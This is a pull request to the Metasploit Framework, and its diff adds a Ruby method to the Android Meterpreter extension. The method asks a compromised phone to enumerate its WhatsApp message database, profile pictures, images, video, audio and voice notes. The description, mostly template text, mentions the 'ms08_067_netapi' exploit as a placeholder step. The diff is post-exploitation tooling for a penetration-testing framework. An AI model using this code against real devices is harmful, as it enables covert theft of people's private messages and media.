### PR TITLE
Update android.rb

### DIFF
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -196,6 +196,24 @@ class Android < Extension
     end
     sms
   end
+  
+  def dump_whatsapp_enum
+    store = Hash.new
+    request = Packet.create_request('dump_whatsapp')
+    request.add_tlv(TLV_TYPE_WHATSAPP_REQUEST, 'enumerate_all')
+    response = client.send_request(request)
+    
+    store =
+      {
+        'msgstore' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_MSG).to_s),
+        'profile' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_PP).to_s),
+        'image' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_IMG).to_s),
+        'video' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_VID).to_s),
+        'audio' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_AUD).to_s),
+        'voice' => client.unicode_filter_encode(response.get_tlv_value(TLV_TYPE_WHATSAPP_ENUM_VOI).to_s)
+      }
+    return store
+  end
 
   def dump_contacts
     contacts = []


### PR DESCRIPTION
the codes above for the dump_whatsapp_enum and the dump_whatsapp features. Here is where the orders are created and the bundles sent to the Meterpreter “server” running through the remote device. In order to understand what’s going on while shipping this orders and the received information, it is highly recommended to check the Packet.rb code.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

